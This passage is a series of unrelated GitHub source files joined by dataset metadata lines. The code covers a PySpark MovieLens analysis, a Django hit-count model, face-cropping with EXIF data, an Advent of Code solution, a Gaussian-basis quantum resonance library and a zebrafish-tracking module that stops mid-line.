----------\n\n# MAGIC %md \n# MAGIC As mentioned before, the year column contains some outlayers and null values. Thus, here I aggregate the data counting the number of movies by year. By doing this, we can see that there are some movies with years from the early 1900s. \n\n# COMMAND ----------\n\njoined_movies.select(\"year\",'avg_rating').groupBy(\"year\").count().orderBy(\"year\").display()\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import split,explode\n\nexploded_movies = movies.withColumn(\"genres\", explode(split(\"genres\",\"[|]\")))\nexploded_movies.groupBy(\"genres\").count().display()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC Something worthy to analyze is to check wether the voters have a bias on a particular genre. This could be tested by taking the average rating by genre and see whether the rating distribution is uniform, that is, that there is no systematic bias towards a particular genre. \n\n# COMMAND ----------\n\nrated_genres = exploded_movies.join(ratings,\"movieId\").select(\"genres\",\"rating\")\nrated_genres.groupBy(\"genres\").mean().display()\n\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC By doing a visual analysis, it seems that the people rating the movies has no bias towards a particular genre. The distribution looks quite uniform, even though the sample is small. \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Let's now proceed to see which movies are the ones with the best score and those ones with the worst score. For this purpose, I will take the top 10 elements from the joined table that includes the movie title and the average rating. 
\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import desc\njoined_movies.select(\"title\",\"avg_rating\").orderBy(desc(\"avg_rating\")).head(10)\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC Now I take the 10 movies with the lowest average rating to see the worst movies in our dataset. \n\n# COMMAND ----------\n\njoined_movies.select(\"title\",\"avg_rating\").orderBy(\"avg_rating\").head(10)\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Exportind the processed dataframes as parquet files to the S3 bucket we used to read the files. As a further step, I will be connecting this tables to AWS Redshift for their analysis. \n\n# COMMAND ----------\n\njoined_movies.write.format(\"parquet\").mode(\"Overwrite\").option(\"path\",\"s3a://filestoragedatabricks/MovieLensData/joined_df\").save()\n\n# COMMAND ----------\n\n\nexploded_movies.write.format(\"parquet\").mode(\"Overwrite\").option(\"path\",\"s3a://filestoragedatabricks/MovieLensData/exploded_df\").save()\n\n# COMMAND ----------\n\nprint(\"hello git\")","repo_name":"MontufarEric/DatabricksRepo","sub_path":"notebooks/Users/eric.montufar@gmail.com/python_code/MovieLens_data.py","file_name":"MovieLens_data.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"13149249091","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass HitCount(models.Model):\n created = models.DateTimeField(_('Created'), auto_now_add=True, editable=False)\n modified = models.DateTimeField(_('Modified'), auto_now=True, editable=False)\n url = models.CharField(_('URL'), max_length=2000)\n hits = models.PositiveIntegerField(_('Hits'), default=0)\n\n class Meta:\n ordering = ('-created', '-modified')\n get_latest_by = 'created'\n","repo_name":"renyi/django-pageviews","sub_path":"pageviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"73"} +{"seq_id":"38932536013","text":"import time\nimport cx_Oracle\nimport pyexifinfo #exiftool\nfrom PIL import Image, ImageDraw\nfrom os.path import exists\nfrom os import makedirs\nimport pyexifinfo as p\n\np.ver() #retrieve your ExifTool version\nfilename = 'Astraat.jpg'\nprint(p.get_json(filename)) #retrieve a json representation of this file exif\nexit()\nglobal_start_time = time.time()\n\ncounter = 0\nimagePath = \"\"\npath = \"\"\n\nconnection = cx_Oracle.connect('python/python@127.0.0.1/xe')\ncursor = connection.cursor()\n\ncursor.execute(\"SELECT face_id, path, name, left, top, right, bottom, filetypeextension FROM faces, images WHERE image_id = image ORDER BY path, name\")\n\nwith pyexifinfo.ExifTool() as et:\n # metadata = et.get_metadata(imagePath)\n faces = cursor.fetchall()\n corpusSize = str(cursor.rowcount)\n for face in faces:\n if path != face[1]:\n path = face[1]\n if not exists(\"Rendered/\" + path[27:]):\n makedirs(\"Rendered/\" + path[27:])\n if imagePath != face[1] + \"/\" + face[2]:\n imagePath = face[1] + \"/\" + face[2]\n img = Image.open(imagePath)\n metadata = et.get_metadata(imagePath)\n if \"EXIF:Orientation\" in metadata:\n if metadata[\"EXIF:Orientation\"] == 3:\n img = img.rotate(180, expand=True)\n elif metadata[\"EXIF:Orientation\"] == 6:\n img = img.rotate(270, expand=True)\n elif metadata[\"EXIF:Orientation\"] == 8:\n img = img.rotate(90, expand=True)\n counter += 1\n print(\"\\r\" + str(counter) + \" of \" + 
corpusSize + \": \" + imagePath + \" \",)\n img.crop((face[3], face[4], face[5], face[6])).save(\"Rendered/\" + path[27:] + \"/\" + face[0] + \".\" + face[7])\n\ncursor.close()\nconnection.close()\n\nprint(\"\\n\\nTotal execution time: \" + str(round(time.time() - global_start_time)) + \" seconds\")\n","repo_name":"khoubeibouthour/Weighted-Cross-Matching","sub_path":"faces.py","file_name":"faces.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39408493935","text":"map = []\ncounter = 0\ntree_count = 0\nfirst = True\nwith open('input.txt') as input:\n for i in input.readlines():\n map.append(i.rstrip()*len(i*2))\n\nfor line in map:\n if first == True:\n first = False\n continue\n counter += 3\n if line[counter] == \"#\":\n tree_count += 1\n if counter + 6 > len(line):\n print(tree_count)\n quit()\n\nprint(tree_count)","repo_name":"Zolor/adventofcode2020","sub_path":"day03/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74907924076","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 2 08:54:27 2021\n\n@author: Thomas Sommerfeld\n\"\"\"\n\n\"\"\"\nA class to manage a Gaussian basis for the Jolanta potential with l=1\n\nLots of helper functions not in the class to keep the legacy notebooks working.\n\"\"\"\n\nimport numpy as np\nimport scipy.special\nfrom scipy.linalg import eigh\n\n\nclass GBR:\n\n def __init__(self, alphas, param, contract=(0, 0), diffuse=(0, 1.4)):\n \"\"\"\n alphas: exponents alphas\n aparam: Jolanta-3D parameters (a,b,c)\n contract(nc, nu): \n uses the lowest nc eigenvectors of H (only nc==1 makes sense)\n and adds nu uncontracted GTOs starting from the smallest alpha\n diffuse(n_diff, scale):\n after contraction, add n_diff even-tempered diffuse functions\n alphas[-1]/s, alphas[-1]/s**2, ... 
\n \"\"\"\n\n self.n_val = len(alphas)\n self.n_diff, scale = diffuse\n self.param = param\n self.nc, self.nu = contract\n \n self.alphas = np.zeros(self.n_val + self.n_diff)\n self.alphas[:self.n_val] = np.sort(alphas)[::-1]\n for j in range(self.n_diff):\n self.alphas[self.n_val+j] = self.alphas[self.n_val+j-1]/scale\n\n self.Ns = np.zeros(self.n_val + self.n_diff) \n for j, a in enumerate(self.alphas):\n self.Ns[j] = Jolanta_3D_PNorm(a)\n\n \"\"\" uncontracted S, T, and V_Jolanta \"\"\"\n self.Sun, self.Tun, self.Vun = Jolanta_GTO_H(self.alphas, self.Ns, self.param)\n\n \"\"\" contraction matrix C with shape (n_primitive, n)contracted) \"\"\"\n self.C = 0\n if self.nc == 0:\n \"\"\" no contraction = all basis function \"\"\"\n self.S, self.T, self.V = self.Sun, self.Tun, self.Vun\n return\n \"\"\" else: contract with valence eigenstates \"\"\"\n nv = self.n_val\n Sval, Tval, Vval = self.Sun[:nv,:nv], self.Tun[:nv,:nv], self.Vun[:nv,:nv]\n Es, cs = eigh(Tval + Vval, b=Sval)\n n_prim = self.n_val + self.n_diff\n n_cont = self.nc + self.nu + self.n_diff\n self.C = np.zeros((n_prim, n_cont))\n self.C[:nv,:self.nc] = cs[:,:self.nc]\n for j in range(n_cont - self.nc):\n self.C[-1-j,-1-j] = 1.0\n \n self.S = np.linalg.multi_dot([self.C.T, self.Sun, self.C])\n self.T = np.linalg.multi_dot([self.C.T, self.Tun, self.C])\n self.V = np.linalg.multi_dot([self.C.T, self.Vun, self.C])\n\n\n def exponents(self):\n return self.alphas\n \n def normalization_constants(self):\n return self.Ns\n \n def print_exp(self):\n print(\" alpha r0=1/sqrt(alpha) Norm\")\n for j, a in enumerate(self.alphas):\n print(f\" {a:15.8e} {np.sqrt(1/a):15.8e} {self.Ns[j]:11.4e}\")\n\n def contraction_matrix(self):\n return self.C\n\n def STV(self):\n return self.S, self.T, self.V\n \n def V_jolanta(self, params):\n \"\"\" \n returns the Jolanta(l=1) potential with different parameters \n does not change self.V\n \"\"\"\n Sun, Tun, Vun = Jolanta_GTO_H(self.alphas, self.Ns, params)\n if self.nc == 0:\n return Vun\n else:\n return np.linalg.multi_dot([self.C.T, Vun, self.C])\n\n \n def H_theta(self, theta, alpha):\n \"\"\" \n theta: scaling angle for the radial coordinate r: exp(i*theta) \n returns: the complex scaled Hamiltonian H(r*exp(i*theta))\n \"\"\"\n z = alpha*np.exp(1j*theta)\n f = z**(-2)\n Vun_rot = Jolanta_GTO_VJrot(self.alphas, self.Ns, self.param, z)\n Hun_rot = f*self.Tun + Vun_rot\n if self.nc == 0:\n return Hun_rot\n else:\n return np.linalg.multi_dot([self.C.T, Hun_rot, self.C])\n \n def Wcap(self, rc):\n \"\"\" real matrix W for the CAP, where W(r 0:\n c_un = np.matmul(self.C, cs)\n return Eval_GTO_wf_3D(self.alphas, self.Ns, c_un, rs, u)\n else:\n return Eval_GTO_wf_3D(self.alphas, self.Ns, cs, rs, u)\n\n\n\ndef Jolanta_3D_PNorm(a):\n \"\"\"\n see Analytic integrals notebook in Stab directory for formulas\n integrals of two GTOs: r*exp(-a_j*r**2) dV = r**2 dr\n return the normalization 1/sqrt(S_jj)\n R is a p-fn, u is a D-fn: \n 4 * 2**(3/4) * sqrt(3) * a1**(5/4) / (3*pi**(1/4))\n \"\"\"\n return 4 * 2**(3/4) * np.sqrt(3) * a**(5/4) / (3*np.pi**(1/4))\n\n\ndef Jolanta_3D_GTO(a1, a2, param):\n \"\"\"\n see Analytic integrals notebook in GTO directory for formulas\n integrals of two GTOs: x*exp(-a_j*x**2)\n computes overlap, kinetic energy, and potential\n R1 and R2 are p-fns, u1 and u2 are D-fns:\n the parameter l is ignored (so that 1D and 3D may call the same fn)\n \"\"\"\n a, b, c = param\n sqrt_pi = np.sqrt(np.pi)\n S = 3 * sqrt_pi / (8*(a1 + a2)**2.5)\n T = sqrt_pi * (1.875*a1*a2 - 0.25*(a1 + a2)**2)/(a1 + 
a2)**3.5 \n VJ = 3 * sqrt_pi * (5*a - 2*a1*b - 2*a2*b - 2*b*c)/(16*(a1 + a2 + c)**3.5)\n VL = sqrt_pi / (4*(a1 + a2)**1.5)\n return S, T, VJ+VL\n\n\ndef Jolanta_GTO_H(alphas, Ns, param):\n \"\"\"\n Hamiltonian matrix in the uncontracted GTO basis set\n \n Parameters\n ----------\n alphas : np.array of GTO exponents\n Ns : np.array of normalization constants\n param : (a, b, c): parameters of the Jolanta potential\n\n Returns 3 numpy matrices\n -------\n S : overlap matrix\n T : kinetic energy matrix\n V : potential energy matrix\n\n \"\"\"\n nbas = len(alphas)\n S=np.zeros((nbas,nbas))\n T=np.zeros((nbas,nbas))\n V=np.zeros((nbas,nbas))\n for i in range(nbas):\n ai, Ni = alphas[i], Ns[i]\n S[i,i], T[i,i], V[i,i] = Jolanta_3D_GTO(ai, ai, param)\n S[i,i] *= Ni*Ni\n T[i,i] *= Ni*Ni\n V[i,i] *= Ni*Ni\n for j in range(i):\n aj, Nj = alphas[j], Ns[j]\n Sij, Tij, Vij = Jolanta_3D_GTO(ai, aj, param)\n S[i,j] = S[j,i] = Ni*Nj * Sij\n T[i,j] = T[j,i] = Ni*Nj * Tij\n V[i,j] = V[j,i] = Ni*Nj * Vij\n return S, T, V\n\n\n\n\ndef Jolanta_3D_CS(a12, param, z):\n \"\"\"\n computes int dr r**4 * exp(-ag*r**2) * (VJ + Vl)\n VJ = (a*r**2 - b)*exp(-c*r**2) = Va - Vb \n Vl = 1/r**2\n for r -> r*exp(i*theta)\n\n this is for a radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n\n z = alpha*exp(I*theta)\n both Va and Vb are valid only for 2*theta <= pi/2\n no problem as the max rotation angle is pi/4\n\n\n VJ(z*r) = (3*sqrt(pi)*(5*a*z**2 - 2*b*(a12 + c*z**2))\n /(16*(a12 + c*z**2)**(7/2)) \n \"\"\"\n a, b, c = param\n sp = np.sqrt(np.pi)\n f = z**2\n #Va = 15*sp*a*f / (16*(a12 + c*f)**(7/2))\n #Vb = 3*sp*b / (8*(a12 + c*f)**(5/2)) \n VJ = ( 3*sp * (5*a*f - 2*b*(a12 + c*f))\n / (16*(a12 + c*f)**3.5) )\n VL = sp / (4*(a12)**1.5) / f\n return VJ + VL\n\n\ndef Jolanta_3D_Wcap(a, rc):\n \"\"\"\n computes int_rc^oo dr r**4 * exp(-a*r**2) * w(r)\n w(r) = (r-rc)**2 for x > rc; else 0\n\n this is for CAP radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n\n - rc*exp(-a*rc**2)/(8*a**3) \n - 3*sqrt(pi)*rc**2*erf(sqrt(a)*rc)/(8*a**(5/2)) \n + 3*sqrt(pi)*rc**2/(8*a**(5/2)) \n - 15*sqrt(pi)*erf(sqrt(a)*rc)/(16*a**(7/2)) \n + 15*sqrt(pi)/(16*a**(7/2))\n\n W = (- rc*exa/(8*a**3)\n - 3*sp*rc**2 * erf / (8*a**(5/2)) \n + 3*sp*rc**2 / (8*a**(5/2)) \n - 15*sp * erf / (16*a**(7/2)) \n + 15*sp / (16*a**(7/2))\n )\n\n W = (- rc*exa / (8*a**3)\n + 3*sp*rc**2 / (8*a**(5/2)) * (1 - erf) \n + 15*sp / (16*a**(7/2)) * (1 - erf)\n )\n\n \"\"\"\n sp = np.sqrt(np.pi)\n exa = np.exp(-a*rc**2)\n erf = scipy.special.erf(rc*np.sqrt(a))\n\n W = (- rc*exa / (8*a**3)\n + 3*sp*rc**2 / (8*a**(5/2)) * (1 - erf) \n + 15*sp / (16*a**(7/2)) * (1 - erf)\n )\n\n return W\n\n\ndef Jolanta_3D_Coulomb(a, rc):\n \"\"\"\n computes int_rc^oo dr r**4 * exp(-a*r**2) * (-1/r)\n\n this is for RAC radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n \n rc is ignored (needed for function uniformity)\n \n returns -1/(2*a**2)\n \"\"\"\n return -1/(2*a**2)\n\n\ndef Jolanta_3D_softbox(a, rc):\n \"\"\"\n computes int_rc^oo dr r**4 * exp(-a*r**2) * w(r)\n w(r) = exp(-4*rc**2/x**2) - 1\n\n this is for RAC radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n\n + 3*sqrt(pi)*rc*cosh(4*sqrt(a)*rc)/(2*a**2) \n - 3*sqrt(pi)*rc*sinh(4*sqrt(a)*rc)/(2*a**2) \n + 2*sqrt(pi)*rc**2*cosh(4*sqrt(a)*rc)/a**(3/2) \n - 2*sqrt(pi)*rc**2*sinh(4*sqrt(a)*rc)/a**(3/2) \n + 3*sqrt(pi)*cosh(4*sqrt(a)*rc)/(8*a**(5/2)) \n - 3*sqrt(pi)*sinh(4*sqrt(a)*rc)/(8*a**(5/2)) \n - 3*sqrt(pi)/(8*a**(5/2))\n\n observe: cosh(a) - sinh(a) = exp(-a)\n\n W = sp * ( 
3*rc*cosh/(2*a**2) \n - 3*rc*sinh/(2*a**2) \n + 2*rc**2*cosh/a**(3/2) \n - 2*rc**2*sinh/a**(3/2) \n + 3*cosh/(8*a**(5/2)) \n - 3*sinh/(8*a**(5/2)) \n - 3/(8*a**(5/2))\n )\n\n\n \"\"\"\n sp = np.sqrt(np.pi)\n sqarc = np.sqrt(a)*rc\n #sinh = np.sinh(4*sqarc)\n #cosh = np.cosh(4*sqarc)\n exa = np.exp(-4*sqarc)\n \n W = sp * ( 3*rc*exa/(2*a**2) \n + 2*rc**2*exa/a**(3/2) \n + 3*(exa-1)/(8*a**(5/2)) \n ) \n \n return W\n\n\n\n\ndef Jolanta_GTO_W(GTO_fn, alphas, Ns, rc):\n \"\"\"\n potential w(r) matrix representation in a GTO basis set\n GTO_fn can be:\n Jolanta_3D_Wcap for the quadratic soft-box for CAP\n Jolanta_3D_Coulomb for a Coulomb potential for RAC\n Jolanta_3D_softbox for a inverse GTO soft-box for RAC \n Parameters\n ----------\n alphas : np.array of GTO exponents\n Ns : np.array of normalization constants\n rc : cutoff of w(r) \n\n Returns \n -------\n W : matrix represention of w(r)\n\n \"\"\"\n nbas = len(alphas)\n W=np.zeros((nbas,nbas))\n for i in range(nbas):\n ai, Ni = alphas[i], Ns[i]\n W[i,i] = Ni * Ni * GTO_fn(ai+ai, rc)\n for j in range(i):\n aj, Nj = alphas[j], Ns[j]\n W[i,j] = W[j,i] = Ni * Nj * GTO_fn(ai+aj, rc)\n return W\n\n\ndef Jolanta_GTO_VJrot(alphas, Ns, param, z):\n \"\"\"\n rotated Jolanta potential V_J(r*exp(I*theta)) in a GTO basis set\n ----------\n Parameters\n alphas : np.array of GTO exponents\n Ns : np.array of normalization constants\n param = (a,b,c) parameters of V_J = (a*r**2 - b)*exp(-c*r**2)\n z = alpha*exp(i*theta), where arg(z) < pi/4; \n -------\n Returns \n Vrot : matrix represention of V_J(r*exp(I*theta))\n \"\"\"\n nbas = len(alphas)\n W=np.zeros((nbas,nbas), complex)\n for i in range(nbas):\n ai, Ni = alphas[i], Ns[i]\n W[i,i] = Ni * Ni * Jolanta_3D_CS(ai+ai, param, z)\n for j in range(i):\n aj, Nj = alphas[j], Ns[j]\n W[i,j] = W[j,i] = Ni * Nj * Jolanta_3D_CS(ai+aj, param, z)\n return W\n\n\n \n \ndef Eval_GTO_wf_3D(alphas, Ns, cs, xs, u=True):\n \"\"\"\n This is the 3D function of l=1\n u(r) = r**2 * exp(-a*r**2)\n R(r) = r * exp(-a*r**2)\n input:\n alphas, norms = a basis set \n cs = GTO coefficient vector\n alphas, Ns, and cs define a wavefunction\n xs = positions at which the wf is to be evaluated\n u=True evaluate the radial function u(r) = r*R(r)\n u=False evaluate the radial function R(r) = u(r)/r\n \"\"\"\n if u:\n l=2\n else:\n l=1\n \n nx = len(xs)\n nbas = len(cs)\n ys = np.zeros(nx)\n for i in range(nx):\n y=0\n xsq = xs[i]**2\n for k in range(nbas):\n y += cs[k] * Ns[k] * np.exp(-alphas[k]*xsq)\n ys[i] = y*xs[i]**l\n return ys \n \n\n","repo_name":"tsommerfeld/L2-methods_for_resonances","sub_path":"Python_libs/GTO_basis.py","file_name":"GTO_basis.py","file_ext":"py","file_size_in_byte":12841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"1573428586","text":"import cv2\r\nimport numpy as np\r\nfrom numba import jit, int64, float64\r\n\r\ntry:\r\n from numba.experimental import jitclass\r\nexcept ModuleNotFoundError:\r\n from numba import jitclass\r\n\r\n\r\nfrom stytra.tracking.tail import find_fish_midline\r\nfrom stytra.tracking.preprocessing import BackgroundSubtractor\r\n\r\nfrom itertools import chain\r\n\r\nfrom lightparam import Param\r\nfrom stytra.tracking.simple_kalman import predict_inplace, update_inplace\r\nfrom stytra.tracking.pipelines import ImageToDataNode, NodeOutput\r\nfrom collections import namedtuple\r\n\r\n\r\ndef _fish_column_names(i_fish, n_segments):\r\n return [\r\n \"f{:d}_x\".format(i_fish),\r\n \"f{:d}_vx\".format(i_fish),\r\n 
\"f{:d}_y\".format(i_fish),\r\n \"f{:d}_vy\".format(i_fish),\r\n \"f{:d}_theta\".format(i_fish),\r\n \"f{:d}_vtheta\".format(i_fish),\r\n ] + [\"f{:d}_theta_{:02d}\".format(i_fish, i) for i in range(n_segments)]\r\n\r\n\r\nclass FishTrackingMethod(ImageToDataNode):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, name=\"fish_tracking\", **kwargs)\r\n self.monitored_headers = [\"biggest_area\", \"f0_theta\"]\r\n self.diagnostic_image_options = [\r\n \"background difference\",\r\n \"thresholded background difference\",\r\n \"fish detection\",\r\n \"thresholded for eye and swim bladder\",\r\n ]\r\n\r\n self.dilation_kernel = np.ones((3, 3), dtype=np.uint8)\r\n self.fishes = None\r\n\r\n def changed(self, vals):\r\n if any(\r\n p in vals.keys() for p in [\"n_segments\", \"n_fish_max\", \"bg_downsample\"]\r\n ) or vals.get(\"reset\", False):\r\n self.reset()\r\n\r\n def reset(self):\r\n self._output_type = namedtuple(\r\n \"t\",\r\n list(\r\n chain.from_iterable(\r\n [\r\n _fish_column_names(i_fish, self._params.n_segments - 1)\r\n for i_fish in range(self._params.n_fish_max)\r\n ]\r\n )\r\n )\r\n + [\"biggest_area\"],\r\n )\r\n self._output_type_changed = True\r\n\r\n # used for booking a spot for one of the potentially tracked fish\r\n self.fishes = Fishes(\r\n self._params.n_fish_max,\r\n n_segments=self._params.n_segments - 1,\r\n pos_std=self._params.pos_uncertainty,\r\n pred_coef=self._params.prediction_uncertainty,\r\n angle_std=np.pi / 10,\r\n persist_fish_for=self._params.persist_fish_for,\r\n )\r\n\r\n def _process(\r\n self,\r\n bg,\r\n n_fish_max: Param(1, (1, 50)),\r\n n_segments: Param(10, (2, 30)),\r\n bg_downsample: Param(1, (1, 8)),\r\n bg_dif_threshold: Param(25, (0, 255)),\r\n threshold_eyes: Param(35, (0, 255)),\r\n pos_uncertainty: Param(\r\n 1.0,\r\n (0, 10.0),\r\n desc=\"Uncertainty in pixels about the location of the head center of mass\",\r\n ),\r\n persist_fish_for: Param(\r\n 2,\r\n (1, 50),\r\n desc=\"How many frames does the fish persist for if it is not detected\",\r\n ),\r\n prediction_uncertainty: Param(0.1, (0.0, 10.0, 0.0001)),\r\n fish_area: Param((200, 1200), (1, 4000)),\r\n border_margin: Param(5, (0, 100)),\r\n tail_length: Param(60.0, (1.0, 200.0)),\r\n tail_track_window: Param(3, (3, 70)),\r\n ):\r\n\r\n # update the previously-detected fish using the Kalman filter\r\n if self.fishes is None:\r\n self.reset()\r\n else:\r\n self.fishes.predict()\r\n\r\n area_scale = bg_downsample * bg_downsample\r\n border_margin = border_margin // bg_downsample\r\n\r\n # downsample background\r\n if bg_downsample > 1:\r\n bg_small = cv2.resize(bg, None, fx=1 / bg_downsample, fy=1 / bg_downsample)\r\n else:\r\n bg_small = bg\r\n\r\n bg_thresh = cv2.dilate(\r\n (bg_small > bg_dif_threshold).view(dtype=np.uint8), self.dilation_kernel\r\n )\r\n\r\n # find regions where there is a difference with the background\r\n n_comps, labels, stats, centroids = cv2.connectedComponentsWithStats(bg_thresh)\r\n\r\n try:\r\n max_area = np.max(stats[1:, cv2.CC_STAT_AREA]) * area_scale\r\n except ValueError:\r\n max_area = 0\r\n\r\n # iterate through all the regions different from the background and try\r\n # to find fish\r\n\r\n messages = []\r\n\r\n nofish = True\r\n for row, centroid in zip(stats, centroids):\r\n # check if the contour is fish-sized and central enough\r\n if not fish_area[0] < row[cv2.CC_STAT_AREA] * area_scale < fish_area[1]:\r\n continue\r\n\r\n # find the bounding box of the fish in the original image coordinates\r\n ftop, fleft, fheight, fwidth = 
(\r\n int(round(row[x] * bg_downsample))\r\n for x in [\r\n cv2.CC_STAT_TOP,\r\n cv2.CC_STAT_LEFT,\r\n cv2.CC_STAT_HEIGHT,\r\n cv2.CC_STAT_WIDTH,\r\n ]\r\n )\r\n\r\n if not (\r\n (fleft - border_margin >= 0)\r\n and (fleft + fwidth + border_margin < bg.shape[1])\r\n and (ftop - border_margin >= 0)\r\n and (ftop + fheight + border_margin < bg.shape[0])\r\n ):\r\n messages.append(\"W:An object of right area found outside margins\")\r\n continue\r\n\r\n # how much is this region shifted from the upper left corner of the image\r\n cent_shift = np.array([fleft - border_margin, ftop - border_margin])\r\n\r\n slices = (\r\n slice(ftop - border_margin, ftop + fheight + border_margin),\r\n slice(fleft - border_margin, fleft + fwidth + border_margin),\r\n )\r\n\r\n # take the region and mask the background away to aid detection\r\n fishdet = bg[slices].copy()\r\n\r\n # estimate the position of the head\r\n fish_coords = fish_start(fishdet, threshold_eyes)\r\n\r\n # if no actual fish was found here, continue on to the next connected component\r\n if fish_coords[0] == -1:\r\n messages.append(\"W:No appropriate tail start position found\")\r\n continue\r\n\r\n head_coords_up = fish_coords + cent_shift\r\n\r\n theta = _fish_direction_n(bg, head_coords_up, int(round(tail_length / 2)))\r\n\r\n # find the points of the tail\r\n points = find_fish_midline(\r\n bg,\r\n *head_coords_up,\r\n theta,\r\n tail_track_window,\r\n tail_length / n_segments,\r\n n_segments + 1,\r\n )\r\n\r\n # convert to angles\r\n angles = np.mod(points_to_angles(points) + np.pi, np.pi * 2) - np.pi\r\n if len(angles) == 0:\r\n messages.append(\"W:Tail not completely detectable\")\r\n continue\r\n\r\n # also, make the angles continuous\r\n angles[1:] = np.unwrap(angles[1:] - angles[0])\r\n\r\n # put the data together for one fish\r\n fish_coords = np.concatenate([np.array(points[0][:2]), angles])\r\n\r\n nofish = False\r\n # check if this is a new fish, or it is an update of\r\n # a fish detected previously\r\n if self.fishes.update(fish_coords):\r\n messages.append(\"I:Updated previous fish\")\r\n elif self.fishes.add_fish(fish_coords):\r\n messages.append(\"I:Added new fish\")\r\n else:\r\n messages.append(\"E:More fish than n_fish max\")\r\n\r\n if nofish:\r\n messages.append(\r\n \"W:No object of right area, between {:.0f} and {:.0f}\".format(\r\n *fish_area\r\n )\r\n )\r\n\r\n # if a debugging image is to be shown, set it\r\n if self.set_diagnostic == \"background difference\":\r\n self.diagnostic_image = bg\r\n elif self.set_diagnostic == \"thresholded background difference\":\r\n self.diagnostic_image = bg_thresh\r\n elif self.set_diagnostic == \"fish detection\":\r\n fishdet = bg_small.copy()\r\n fishdet[bg_thresh == 0] = 0\r\n self.diagnostic_image = fishdet\r\n elif self.set_diagnostic == \"thresholded for eye and swim bladder\":\r\n self.diagnostic_image = np.maximum(bg, threshold_eyes) - threshold_eyes\r\n\r\n if self._output_type is None:\r\n self.reset_state()\r\n return NodeOutput(\r\n messages, self._output_type(*self.fishes.coords.flatten(), max_area * 1.0)\r\n )\r\n\r\n\r\nspec = [\r\n (\"n_fish\", int64),\r\n (\"coords\", float64[:, :]),\r\n (\"i_not_updated\", int64[:]),\r\n (\"F\", float64[:, :]),\r\n (\"uncertainties\", float64[:]),\r\n (\"Q\", float64[:, :]),\r\n (\"Ps\", float64[:, :, :, :]),\r\n (\"def_P\", float64[:, :, :]),\r\n (\"persist_fish_for\", int64),\r\n]\r\n\r\n\r\n@jitclass(spec)\r\nclass Fishes(object):\r\n def __init__(\r\n self, n_fish_max, pos_std, angle_std, n_segments, pred_coef, 
persist_fish_for\r\n ):\r\n self.n_fish = n_fish_max\r\n self.coords = np.full((n_fish_max, 6 + n_segments), np.nan)\r\n self.uncertainties = np.array((pos_std, angle_std, angle_std))\r\n self.def_P = np.zeros((3, 2, 2))\r\n for i, uc in enumerate(self.uncertainties):\r\n self.def_P[i, 0, 0] = uc\r\n self.def_P[i, 1, 1] = uc\r\n self.i_not_updated = np.zeros(n_fish_max, dtype=np.int64)\r\n self.Ps = np.zeros((n_fish_max, 3, 2, 2))\r\n self.F = np.array([[1.0, 1.0], [0.0, 1.0]])\r\n dt = 0.02\r\n self.Q = (\r\n np.array([[0.25 * dt**4, 0.5 * dt**3], [0.5 * dt**3, dt**2]])\r\n * pred_coef\r\n )\r\n self.persist_fish_for = persist_fish_for\r\n\r\n def predict(self):\r\n for i_fish in range(self.n_fish):\r\n if not np.isnan(self.coords[i_fish, 0]):\r\n for i_coord in range(0, 6, 2):\r\n predict_inplace(\r\n self.coords[i_fish, i_coord : i_coord + 2],\r\n self.Ps[i_fish, i_coord // 2],\r\n self.F,\r\n self.Q,\r\n )\r\n self.i_not_updated[i_fish] += 1\r\n if self.i_not_updated[i_fish] > self.persist_fish_for:\r\n self.coords[i_fish, :] = np.nan\r\n\r\n def update(self, new_fish):\r\n for i_fish in range(self.n_fish):\r\n if not np.isnan(self.coords[i_fish, 0]):\r\n if self.is_close(new_fish, i_fish) and self.i_not_updated[i_fish] != 0:\r\n # update position with Kalman filtering\r\n for i_coord in range(0, 3):\r\n # if it is the angle find the modulo 2pi closest\r\n nc = new_fish[i_coord]\r\n if i_coord == 2:\r\n nc = _minimal_angle_dif(self.coords[i_fish, 4], nc)\r\n update_inplace(\r\n nc,\r\n self.coords[i_fish, i_coord * 2 : i_coord * 2 + 2],\r\n self.Ps[i_fish, i_coord],\r\n self.uncertainties[i_coord],\r\n )\r\n # update tail angles\r\n self.coords[i_fish, 6:] = new_fish[3:]\r\n self.i_not_updated[i_fish] = 0\r\n return True\r\n\r\n def add_fish(self, new_fish):\r\n for i_fish in range(self.n_fish):\r\n if np.isnan(self.coords[i_fish, 0]):\r\n self.coords[i_fish, 0:6:2] = new_fish[:3]\r\n self.coords[i_fish, 1:6:2] = 0.0\r\n self.coords[i_fish, 6:] = new_fish[3:]\r\n self.Ps[i_fish] = self.def_P\r\n self.i_not_updated[i_fish] = 0\r\n return True\r\n return False\r\n\r\n def is_close(self, new_fish, i_fish):\r\n \"\"\"Check whether the new coordinates are\r\n within a certain number of pixels of the old estimate\r\n and within a certain angle\r\n \"\"\"\r\n n_px = 15\r\n d_theta = np.pi / 2\r\n dists = new_fish[:2] - self.coords[i_fish, 0:4:2]\r\n dtheta = np.abs(\r\n np.mod(new_fish[2] - self.coords[i_fish, 